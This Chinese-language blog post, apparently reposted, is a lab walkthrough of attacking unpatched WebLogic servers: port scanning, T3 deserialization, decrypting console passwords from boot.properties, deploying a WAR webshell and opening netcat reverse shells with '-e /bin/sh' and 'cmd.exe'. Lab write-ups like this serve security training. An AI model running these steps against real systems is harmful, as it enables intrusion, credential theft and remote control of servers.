Web渗透实验:基于Weblogic的一系列漏洞
1. 攻击机windows10 192.168.2.104
2. 靶机ip:
192.168.2.109(linux Ubantu)
192.168.2.111(windows2008R264位)
第一步:启动靶机服务
分别为linux和windows
windows环境搭建:
链接:https://pan.baidu.com/s/16KyYb1v1rP9uJ6-5MBotVw
提取码:9ti4
第二步:发现weblogic服务
当我们拥有客户授权的情况下,一般采取nmap,masscan甚至是Python自己编写的端口扫描工具,各有优缺。
网上开源很多,这里从网上拿来一款开源的扫描器(基于python2)。
代码如下:
# -*- coding: utf-8 -*-import optparsefrom threading import *from socket import *screenLock=Semaphore(value=1)def connScan(tgtHost,tgtPort):try:connSkt = socket(AF_INET,SOCK_STREAM)connSkt.connect((tgtHost,tgtPort))connSkt.send('ViolentPython\r\n')results=connSkt.recv(100)screenLock.acquire()#打印前的加锁操作。print ('[+.+] %d/tcp 开启'% tgtPort+' '+str(results)).decode('UTF-8').encode('GBK')# print ('[+.+] '+str(results))connSkt.close()except:screenLock.acquire()print ("[-.-] %s/tcp 关闭"%tgtPort).decode('UTF-8').encode('GBK')finally:screenLock.release()#终止阻塞其他线程前需要执行的代码。connSkt.close()def portScan(tgtHost,tgtPorts):try:tgtIP=gethostbyname(tgtHost)except:print ("[-.-] 报告老大不能解析目标 '%s': 未知目标"%tgtHost).decode('UTF-8').encode('GBK')returntry:tgtName=gethostbyaddr(tgtIP)print ('\n[+.+] 已经获得目标地址:'+tgtName[0]).decode('UTF-8').encode('GBK')except:print ('\n[+.+] 已经获得目标地址:'+tgtIP).decode('UTF-8').encode('GBK')setdefaulttimeout(1)for tgtPort in tgtPorts:t=Thread(target=connScan,args=(tgtHost,int(tgtPort)))#多线程t.start()def main():print ("皮皮虾正在探路请耐心等待...").decode('UTF-8').encode('GBK')parser=optparse.OptionParser('usage %prog -H' +'<target host> -p <target port>')parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')parser.add_option('-P',dest='tgtPort',type='string',help='specify target post')(options,args)=parser.parse_args()tgtHost = options.tgtHosttgtPorts = str(options.tgtPort).split(',')if (tgtHost==None)|(tgtPorts[0]==None):print ('[-.-] 老大你忘了输入目标地址和端口啦.').decode('UTF-8').encode('GBK')exit(0)portScan(tgtHost,tgtPorts)if __name__ == '__main__':print ("欢迎使用本扫描器,我是皮皮虾").decode('UTF-8').encode('GBK')main()
具体编写指南可以参考原文链接,适合刚开始学习python的朋友们
https://bbs.ichunqiu.com/thread-40994-1-1.html
扫描结果为关闭,换个端口试试
为什么为造成这种情况呢,分析原因:
可能因为我们这个py版端口扫描是调用的socket模块,给端口发送一些垃圾数据,如果服务端返回数据才代表我们这个端口开放,所以7001端口没有给我们想要的数据,脚本就认为它没有开放。
祭出我们强大的Nmap
发现我们服务器靶机确实是开放了7001端口的,^…^。
第三步:对weblogic服务渗透的思路
发现weblogic服务,第一反应是常见的能getshell的漏洞
比如后台弱口令,密码是base64编码的,可以用burpsuite增加编码参数,也可以用网上开源的一些工具进行爆破,然后war包部署拿shell。
再比如对weblogic的T3协议,反序列化命令执行,直接执行系统命令。
像目录样例操纵和拒绝服务这些鸡肋的漏洞我们这暂且不谈。这个靠的是渗透经验,就像上次参加一个众测,网站出现了action结尾的网址时,立马直接struts2命令执行扫了一下直接getshell菜刀连上,高危漏洞吧,当然了,跟大佬们一起挖洞众测,这么简单的漏洞,比的就是速度了,后面有空会分享一些挖洞的经验,这里暂且不提。
第四步:对weblogic服务的渗透
我们这里安装的weblogic是10.3.6,没有打补丁,也没有禁用t3协议。我们可以使用工具进行反序列化利用。
(windows)
(linux)
然后执行一系列命令查看我们入侵靶机的环境
因为是靶机,直接给的administrator权限,也开放了3389端口,当然了,在实战过程中,我一开始很少连接3389上去,不安全也不可靠。
常规套路,net user增加用户,给权限等,注意如果不是公网的服务器,Web服务端口是映射出来的化,我们这边还需要给我们自己这边的攻击机弹个shell,有很多工具,这里用瑞士军刀演示。
因为是windows我们先上传瑞士军刀到服务器上,然后使用命令,转发cmd到我们的攻击机上。从weblogic反序列化得到的执行权限无法反弹,所以我们需要先上传一个大马来执行命令。因为是靶机并没有部署web环境,我们再来看控制台。
控制台密码在目录
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties
得到了加密的用户密码:
我们开始破解它
第五步:破解weblogic控制台密码
jdk安装说明:
https://www.cnblogs.com/eagle6688/p/7873477.html
破解工具:
https://codeload.github.com/NetSPI/WebLogicPasswordDecryptor/zip/master
插件:
http://repo2.maven.org/maven2/org/bouncycastle/bcprov-ext-jdk16/1.46/bcprov-ext-jdk16-1.46.jar
将插件复制到目录
C:\Program Files\Java\jdk1.8.0_201\jre\lib\ext(jdk环境)
破解 weblogic 控制台密码需要 2 个条件
SerializedSystemIni.dat 密钥文件
(c:\Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystem Ini.dat)
boot.properties 控制台用户名和密码
(C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties)
编译下载的破解文件
Javac WebLogicPasswordDecryptor.java
破解
记住 破解的时候java和javac 版本一定要一样,如果是后面新安装的java和之前的java会冲突,需要到系统变量中修改一下,否则会出现下图的报错
破解成功之后的
账号:weblogic
密码:weblogic123
原来是弱口令,嘿嘿。所以大家下次注意,遇到这种控制台,第一反应就是去手动尝试一些弱口令。当然也可以使用暴力破解
可以使用python脚本:
https://github.com/b4zinga/Explib/blob/master/weblogic.py
有了账号密码,就是常规套路部署war包了。
/**/
制作war包大马,把大马以zip格式压缩然后重命名为xxx.war即可
1、登录控制台(以Linux靶机为例)
访问登陆控制台
http://192.168.43.22:7001/console
选择上传文件
上传我们制作的war包大马
上传的路径
然后一直下一步
激活更改
选择刚部署的项目启动
随后访问http://192.168.43.22:7001/cmd/cmd.jsp即可打开大马
(linux)
(windows)
第六步:弹shell
在windows下:
靶机执行:
nc.exe -l -p 8888 -t -e cmd.exe
本机执行:
nc.exe -nvv 192.168.2.111 8888
在linux下:
靶机执行:
nc 192.168.2.104 8888 -e /bin/sh
本机执行:
nc.exe -lvnp 8888
我们看到-e参数报错了这是因为
Ubuntu上默认安装的是netcat-openbsd,而不是经典的netcat-traditional
sudo apt-get -y install netcat-traditional
然后sudo update-alternatives –config nc,选择2
Linux靶机执行:nc -vlp 8888 -e /bin/bash
本机执行:nc.exe 192.168.2.109 8888
即可成功弹shell
第七步:横向渗透
用的比较多的是proxifier 正向代理,下一篇文件见。
*本文原创作者:zhukaiang7
转载于:https://www.cnblogs.com/Fluorescence-tjy/p/10341525.html
Web渗透实验:基于Weblogic的一系列漏洞相关推荐
- 学完可入狱:《Web渗透测试-基于Kali Linux》经典黑客入门教程
特别说明 此教程为纯技术分享!严禁利用本书所提到的漏洞和技术进行非法攻击,本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任! 前言 网络江湖,风起云涌,攻防 ...
- web渗透测试----11、身份认证漏洞
文章目录 一.什么是身份认证? 1.身份认证三要素 2.身份认证和授权的区别 二.身份验证漏洞如何产生? 三.身份认证常见的漏洞 1.基于密码的登录漏洞 2.双因子身份验证中的漏洞 3.其他身份验证机 ...
- Kali Linux Web 渗透测试秘籍 第四章 漏洞发现
第四章 漏洞发现 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们现在已经完成了渗透测试的侦查阶段,并且识别了应用所使用的服务器和 ...
- 【愚公系列】2023年05月 网络安全高级班 065.WEB渗透与安全(SQL注入漏洞-手工注入)
文章目录 前言 一.SQL注入漏洞-手工注入 1.错误注入 2.布尔注入 2.1 通过`'or 1=1 --` 注入 2.2 通过`admin'or 1=1 --` 注入 3.联合注入 3.1 查看u ...
- 【愚公系列】2023年05月 网络安全高级班 071.WEB渗透与安全(文件包含漏洞原理利用防御)
文章目录 前言 一.文件包含漏洞原理利用防御 1.原理 1.1 简介 1.2 分类 1.3 代码 1.3.1 shell语句 1.3.2 包含语句 2.渗透 2.1 低安全级别 2.1.1 本地文件包 ...
- web渗透测试----5、暴力破解漏洞--(6)VNC密码破解
文章目录 一.hydra 二.Medusa 三.Ncrack 四.Patator 五.Metasploit 虚拟网络控制台 (Virtual Network Console:VNC)是一款优秀的远程控 ...
- Web渗透信息收集之域名、端口、服务、指纹、旁站、CDN和敏感信息
[网络安全] 二.Web渗透信息收集之域名.端口.服务.指纹.旁站.CDN和敏感信息 最近开始学习网络安全和系统安全,接触到了很多新术语.新方法和新工具,作为一名初学者,感觉安全领域涉及的知识好广.好 ...
- 【web渗透】专栏文章汇总
一.基础部分 web渗透–1–写在开始 web渗透–2–web安全原则(上) web渗透–3–web安全原则(下) web渗透–4–web渗透测试清单 web渗透–5–自动化漏洞扫描 web渗透–6– ...
- 针对某个WEB渗透的整套修复建议(更新部分)
一个WEB渗透包括: 1. 系统级别漏洞 2. 静态代码审计 3. 应用本身安全 文章会针对上面三个方面可能出现的问题进行说明,同时提出个人的修复建议. 测试网址:https://******(IP地 ...
最新文章
- Android中Activity共享变量的另一方法:Application context
- C#进阶系列——WebApi 身份认证解决方案:Basic基础认证
- django安装mysql_django+mysql安装和设置
- JavaScript之事件冒泡和事件捕获详细介绍
- 构架高性能WEB网站的几点知识
- python自带gui_Python GUI开发工具中五种类型的相关介绍
- 都忘了自己还有一套房子了。。。
- Asp.Net把word文件转换为html文件
- HashMap[转]
- 天网防火墙技术白皮书
- 定积分(Definite Integral)
- 关于ztree的操作
- azkaban任务一直处于preparing,解决办法
- 深入解析车牌识别相机在互联网+加油站中的应用方案
- CrossWalk - Android 动态加载so库文件
- sqlserver的分页查询
- android开发中如何判断手机中存在的sim卡数量?
- 阿里云上的使用QQ邮箱发送邮件
- Java案例--减肥计划
- 计算机专业英语词组,《计算机专业英语词组.doc
热门文章
- python知识点汇总_Python知识点总结大全(一)
- python语言精通_Python语言基础从入门到精通
- c free语言自定义函数,C 语言free函数的工作原理
- rto初始化和计算_TCP系列13—重传—3、协议中RTO计算和RTO定时器维护
- oracle symonym_ORACLE SYNONYM详解
- python性能解决_我们如何发现并解决Python代码中性能下降的问题
- MongoDB 数据类型查询——$type使用
- aes模式_AES的完整形式是什么?
- 联轴器选型_联轴器| 软件工程
- php title限制字数,dedecms:title解决字数限制的两种方法